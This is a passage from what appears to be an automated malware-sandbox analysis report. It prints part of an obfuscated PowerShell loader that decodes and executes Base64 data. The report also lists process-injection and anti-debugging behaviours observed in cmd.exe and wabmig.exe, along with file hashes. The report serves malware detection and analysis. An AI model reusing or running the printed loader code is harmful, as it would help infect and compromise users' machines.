'Flle$ReingPortlSo.roSv rbVitaaToksl Acr:po.iSLegacCrysr,iglaSussiPol g RhehInvae UnsdNann Pedr=Bond AbouGSpideBasktBust- IstCMicro Svan KortAfteeTabln LintTro Stru$MizeS IncnEkskoQuaco.blet KoniM,stlRok yLivs ');hjreafledninger (Unjagged 'Nong$Cat gSpinlTredo Supb ataE relyngl:So iAElimnU ebtAndehGarrrThoroMosqpStapoMaskg TraeFi voMonggH nirUbeaaSlaap,orjhA skiVi,lcAss,a Sk,lPja, F b=Paas Afst[OsdiSB,osyH.lss GastJu peDe rmAnsa.SignCEndioTr cnRegnvTu.le Hanr Albt F,l]Felt:De.e:CystF Synr aromusem eliBPl ta Gles,psleLif.6athe4LordS Dect oryrSermiRiannMolggDisq(K.rt$s.ydSSludcCo dr Gala S.fiDirigSa thDefae Ha,dTje ) ils ');hjreafledninger (Unjagged ' Non$ VedgAnkelInteo upebCharaBirclFri.:Sp aGEnteyRechmTetrnC,inaH mis cast H.li S.nkBarrf UnroPrivr H peDippnAfskifl unInspgUnree ncurLorr1Blde3Job 4 Sha Apoq=Rer U ed[MecuSPlysy aksElemtSempe,urtmS,em. SteTThe.eHinsxNredt Fl .SufiE.unknOvincDownoEle d fliiSkrbn InggForb] lde:Suve:ParaA Pr S PraCKoloIUn hISlib.LouiGDe,eeH,ngtTo aSHue t astr Wi,iStign tiegSeki(Jobn$PlunAMi.dnTwistNo.ehCunerTragoG.lepstaro Pl gS iteNatuoC,ung Si,rAldea ConpPre,h.kimi FlicTaalaKuraltvrd)hnse ');hjreafledninger (Unjagged 'Omst$WersgCorolBorto nsbCigaaB,wslAjle:S ylTretse sperEmeem PesoFimbs FintDrawaProntGabboMislv idwn Re e AlgnAs isEndh= O e$Svr,GEsloy vlmAn jnSinka WidsFremtphotiBacokThwafRaafoBetrrB lfeideonAppoiPectnfo,eg EnceDemorNels1Virk3Indr4Forr. ProsSynduelecb Om sKa.kt remrBr niPej,n,leugFors( J h$SvbeSSyg tSpedoVer rNedraSabrk FelsRedneRobanWauk9Isvr6Fi u,Re.s$ ermMTr,vo lekuBiosrlaboiPe.ptAd ez ejeunpo)C tg ');hjreafledninger $Termostatovnens;"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Henfoere.Fem && echo t"5⤵
- System Location Discovery: System Language Discovery
PID:2212
-
-
C:\Program Files (x86)\windows mail\wabmig.exe"C:\Program Files (x86)\windows mail\wabmig.exe"5⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2524
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
428KB
MD50b2bd7535a362d772acf2a6769ad6537
SHA1e02b3df5f5b62d918a4203f8ec6877e0a67b8af8
SHA2568040306c7feac0f79361f9cd1bdcc50951126e4bd24886af56a96d0639352c78
SHA512abe7c8a183c525197bfc42263ca52efa8be29140d7aad06789135197d0f652d2f63d369e887e1ce50fc4a33549c7bec92655334e2c53069f1a1258d0b90191f1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OE5AGRLQUK7CWVX2LP37.temp
Filesize7KB
MD5e3cadb0bf8234913729cc296313f9cec
SHA1a944c97c88f72affeed6ab5880f83a54532c8b42
SHA256ea218c1cdf273ab1050eb71dd90b65b0ea43a143ce21e0492cea672a2a7b89d6
SHA5129bb40d5664f1c2ccab5bf83b93c0b0852c257144d8cddf3da223f4e6c66b962e95a605a8509dd279a9841669c2dc4941384b39cb35e0e7d8fbdde0fca7925770